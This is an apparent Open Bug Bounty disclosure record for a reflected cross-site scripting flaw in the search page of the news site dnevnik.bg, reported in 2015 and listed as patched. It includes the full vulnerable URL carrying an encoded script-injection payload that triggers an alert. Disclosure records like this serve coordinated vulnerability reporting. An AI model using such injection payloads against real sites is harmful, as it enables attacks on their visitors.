dnevnik.bg XSS vulnerability

2015-10-31T02:32:00
ID OBB:98406
Type openbugbounty
Reporter P4r4Bellum
Modified 2015-10-31T02:35:00

Description

Vulnerable URL:
http://www.dnevnik.bg/search.php?stext=\%27]%29%3Balert%28%2FXSSPOSED%2F%29%2F%2F&rubrid;=0&searchinto;=0&sort;=0&fromdate;=%D0%9E%D1%82+%D0%B4%D0%B0%D1%82%D0%B0&todate;=%D0%94%D0%BE+%D0%B4%D0%B0%D1%82%D0%B0&tAction;=%D0%A2%D1%8A%D1%80%D1%81%D0%B5%D0%BD%D0%B5&backurl;=&selfurl;=&kfor;_name=ssearch
Details:

Description| Value
---|---
Patched:| Yes, at 21.11.2015
Latest check for patch:| 21.11.2015 03:04 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 15675
Google Pagerank| 7
VIP website status:| Yes
Check dnevnik.bg SSL connection:| (Grade: C+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability reported| 31 October, 2015 02:32 GMT
Vulnerability existence verified and confirmed| 31 October, 2015 02:35 GMT